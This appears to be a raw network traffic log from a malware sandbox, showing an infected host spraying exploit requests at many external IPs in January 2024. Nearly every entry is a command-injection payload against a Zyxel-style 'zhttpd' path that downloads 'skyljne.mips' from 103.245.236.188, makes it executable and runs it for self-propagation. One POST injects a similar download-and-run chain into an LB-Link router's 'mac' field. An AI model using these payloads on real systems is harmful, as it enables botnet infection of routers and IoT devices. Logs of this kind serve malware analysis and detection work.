                                    Jan 13, 2024 19:02:21.899303913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1515192.168.2.133612897.211.130.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899367094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1516192.168.2.1341040148.180.135.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899389982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1517192.168.2.1355152218.192.72.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899430037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1518192.168.2.1337820132.56.130.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899478912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1519192.168.2.1353106158.4.190.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899533987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1520192.168.2.134445248.136.215.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899563074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1521192.168.2.13481704.203.68.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899586916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1522192.168.2.135343431.235.147.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899638891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1523192.168.2.135485675.165.38.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899658918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1524192.168.2.1356244190.108.55.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899715900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1525192.168.2.1358400200.126.44.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899765968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1526192.168.2.1349678148.204.215.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899800062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1527192.168.2.1338104173.177.225.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899832010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1528192.168.2.1348314147.38.171.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899885893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1529192.168.2.1352848101.89.169.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899925947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1530192.168.2.133573649.59.78.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899977922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1531192.168.2.1346524180.117.146.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.900010109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1532192.168.2.1344560198.222.172.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.900033951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1533192.168.2.135401871.224.50.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.900063038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1534192.168.2.1337188155.0.51.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.900116920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1535192.168.2.135130271.98.48.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.900149107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1536192.168.2.1360398167.9.54.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.900177002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1537192.168.2.133297834.98.79.1568080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.813271999 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1538192.168.2.133598453.35.137.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.906897068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1539192.168.2.1342322124.31.18.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.906927109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1540192.168.2.1354750140.92.145.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.906966925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1541192.168.2.1336446179.172.164.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907061100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1542192.168.2.1342114169.11.172.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907129049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1543192.168.2.134116286.186.138.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907188892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1544192.168.2.1351888118.181.184.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907238960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1545192.168.2.1336378189.150.67.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907275915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1546192.168.2.1359978178.6.67.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907371998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1547192.168.2.135196864.47.113.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907461882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1548192.168.2.1337686188.249.173.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907531977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1549192.168.2.1338902181.122.99.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907598972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1550192.168.2.1357142199.217.171.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907653093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1551192.168.2.133689244.133.38.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907705069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1552192.168.2.1345448217.73.56.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907736063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1553192.168.2.134794037.68.230.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907866001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1554192.168.2.133393868.211.151.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907912970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1555192.168.2.1355712209.223.35.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.907965899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1556192.168.2.1334750132.139.58.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908025980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1557192.168.2.133675234.246.125.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908073902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1558192.168.2.1341450145.230.235.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908139944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1559192.168.2.135305025.35.8.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908180952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1560192.168.2.1347284122.137.76.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908263922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1561192.168.2.1360554179.147.33.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908288002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1562192.168.2.135880241.155.118.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908340931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1563192.168.2.136043242.182.230.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908416033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1564192.168.2.1343962136.123.182.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908458948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1565192.168.2.133846298.98.103.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908524036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1566192.168.2.1359148120.144.151.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908574104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1567192.168.2.1345564158.80.198.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908643007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1568192.168.2.133298270.165.126.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908670902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1569192.168.2.134322080.199.31.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908720016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1570192.168.2.1334820161.116.56.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908790112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1571192.168.2.1340292101.56.252.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908844948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1572192.168.2.1350786125.98.157.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908875942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1573192.168.2.1341832176.201.200.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908905029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1574192.168.2.1359516181.210.186.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:22.908961058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1575192.168.2.135392413.78.49.217443
                                    TimestampBytes transferredDirectionData
